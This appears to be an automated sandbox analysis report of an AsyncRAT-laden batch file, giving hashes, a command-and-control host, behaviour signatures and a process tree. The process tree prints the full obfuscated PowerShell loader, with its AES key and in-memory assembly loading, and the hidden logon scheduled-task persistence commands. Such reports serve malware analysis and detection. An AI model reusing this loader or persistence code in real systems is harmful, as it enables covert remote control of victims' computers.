Analysis

  • max time kernel
    39s
  • max time network
    39s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-06-2024 22:08

General

  • Target

    dotnet.bat

  • Size

    62KB

  • MD5

    3dfb1c3ff09dc31a4096b821b9ff204b

  • SHA1

    8604c300175bf352b7612412c6521064a2514674

  • SHA256

    a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b

  • SHA512

    895cfb222d6b20b9761188531a3ba45df6f7f799aaf760c14c2de4892947a124c35bcd66e20e98cf62bd4c635c46fc5f8ab6d8c7207a081d98b2b8b31a47e172

  • SSDEEP

    1536:nOTyT0nIr49koWVZVCud2f7vXJiEOlVnpw0APKNjO4mdFqQjHQp+XuHdd:OmTGZ0aPIEapexSNjO4mdFqQjHQp+Xun

Malware Config

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

WinExplOMG

C2

stormx.dynu.net:77

Mutex

winexpomg

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3676
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "
        3⤵
          PID:4896
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1916
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3444
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dotnet')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4824
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:800
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3664
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4912
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network15166Man.cmd';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "
                6⤵
                  PID:4000
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  6⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:464
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4924
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network15166Man')
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4212
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4344
          • C:\Windows\system32\timeout.exe
            timeout /nobreak /t 1
            3⤵
            • Delays execution with timeout.exe
            PID:3424
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:2768

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          1KB

          MD5

          938ffc2cba917b243d86b2cf76dcefb4

          SHA1

          234b53d91d075f16cc63c731eefdae278e2faad3

          SHA256

          5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

          SHA512

          e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Filesize

          21KB

          MD5

          ca86c56c43469d64429b0ceac9a6244a

          SHA1

          096af882cffc54003eb90c70ea0e7430bab218ce

          SHA256

          8e9e05e948ea3ae93545f3c079e718a24d2b3224fa1686eae5fbe3621d74059c

          SHA512

          634c878e298022da59fdcc2c33b6514bf5d45d6e4d893d2646c63e1922e5066c98b88d7c09256e6aadeba18012406fb896ff2b337eb16f886d162493979adeeb

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          21KB

          MD5

          86340a2269cc2e3ed5f72aff7c6e87b7

          SHA1

          ed4e05673352bf376a4ea5a0a3c81e935f68bbd7

          SHA256

          1238383796584fcf9f5bfd63424b06b685dc73b18edf53bf52114cdc58363ffc

          SHA512

          9df41060170fed81a12aca98c3f6183201c3636bb1f76f7e2b3ccb7d0be66b523bb16f28d8d1501238bcf9b2bca527c84c206334239b0ee2566286b782c705ca

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          20KB

          MD5

          632280a520f1aaf45cee26c44f846468

          SHA1

          69f0e1002e99101089e42072f0c8505a5f542353

          SHA256

          122dbb93b1e8f381b06abf0cb7901ea14709b57c941b2e16abb4c2d70efd1018

          SHA512

          94237bdbdd13df82ca75362878fee31f8ca9952c872cd2961f27ee99d9bf9f4718e9bfab12f4e59a520ee10fdbc10596d995f2dcbfc2117a3389012b61078eed

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          20KB

          MD5

          bc5e40517fe8f3f73fdd3a27d4fe7d6d

          SHA1

          0b0ea9ee27a747a5b6a4121de931dd15f0429bb4

          SHA256

          a7e28126148286b23e0a2e3146d2c7a7a4b5d780cc8ff50bb4e3f4c7f486a8c4

          SHA512

          c169fbf7c0a722abffd7802bbfc7559adacc3e7ba9ffcfe2825f2055d8860f8ddf90aa5ecffb2c9b7e8bdb409479870c463048af1d98e161ad854644f45f0eaf

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puf2xrl2.0of.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Network15166Man.cmd

          Filesize

          62KB

          MD5

          3dfb1c3ff09dc31a4096b821b9ff204b

          SHA1

          8604c300175bf352b7612412c6521064a2514674

          SHA256

          a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b

          SHA512

          895cfb222d6b20b9761188531a3ba45df6f7f799aaf760c14c2de4892947a124c35bcd66e20e98cf62bd4c635c46fc5f8ab6d8c7207a081d98b2b8b31a47e172

        • memory/464-160-0x0000000007E50000-0x0000000007E5A000-memory.dmp

          Filesize

          40KB

        • memory/464-159-0x0000000007E70000-0x0000000007F02000-memory.dmp

          Filesize

          584KB

        • memory/464-158-0x0000000008B60000-0x0000000009104000-memory.dmp

          Filesize

          5.6MB

        • memory/464-157-0x0000000005290000-0x00000000052A6000-memory.dmp

          Filesize

          88KB

        • memory/800-77-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

          Filesize

          304KB

        • memory/1916-111-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/1916-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

          Filesize

          408KB

        • memory/1916-22-0x0000000007BA0000-0x000000000821A000-memory.dmp

          Filesize

          6.5MB

        • memory/1916-23-0x0000000007540000-0x000000000755A000-memory.dmp

          Filesize

          104KB

        • memory/1916-1-0x0000000004CD0000-0x0000000004D06000-memory.dmp

          Filesize

          216KB

        • memory/1916-3-0x0000000005340000-0x0000000005968000-memory.dmp

          Filesize

          6.2MB

        • memory/1916-2-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/1916-4-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/1916-39-0x0000000007620000-0x0000000007630000-memory.dmp

          Filesize

          64KB

        • memory/1916-20-0x0000000006720000-0x0000000006764000-memory.dmp

          Filesize

          272KB

        • memory/1916-5-0x00000000052C0000-0x00000000052E2000-memory.dmp

          Filesize

          136KB

        • memory/1916-21-0x00000000074A0000-0x0000000007516000-memory.dmp

          Filesize

          472KB

        • memory/1916-0-0x0000000074F2E000-0x0000000074F2F000-memory.dmp

          Filesize

          4KB

        • memory/1916-7-0x0000000005A50000-0x0000000005AB6000-memory.dmp

          Filesize

          408KB

        • memory/1916-17-0x0000000005C40000-0x0000000005F94000-memory.dmp

          Filesize

          3.3MB

        • memory/1916-18-0x00000000061C0000-0x00000000061DE000-memory.dmp

          Filesize

          120KB

        • memory/1916-19-0x00000000061E0000-0x000000000622C000-memory.dmp

          Filesize

          304KB

        • memory/3444-24-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3444-25-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3444-26-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3444-38-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/4212-134-0x0000000007640000-0x0000000007651000-memory.dmp

          Filesize

          68KB

        • memory/4212-123-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

          Filesize

          304KB

        • memory/4212-133-0x00000000072E0000-0x0000000007383000-memory.dmp

          Filesize

          652KB

        • memory/4344-146-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

          Filesize

          304KB

        • memory/4824-62-0x0000000007B00000-0x0000000007BA3000-memory.dmp

          Filesize

          652KB

        • memory/4824-50-0x0000000007AB0000-0x0000000007AE2000-memory.dmp

          Filesize

          200KB

        • memory/4824-51-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

          Filesize

          304KB

        • memory/4824-61-0x0000000007A90000-0x0000000007AAE000-memory.dmp

          Filesize

          120KB

        • memory/4824-65-0x0000000007E50000-0x0000000007E61000-memory.dmp

          Filesize

          68KB

        • memory/4824-63-0x0000000007CC0000-0x0000000007CCA000-memory.dmp

          Filesize

          40KB

        • memory/4824-64-0x0000000007EE0000-0x0000000007F76000-memory.dmp

          Filesize

          600KB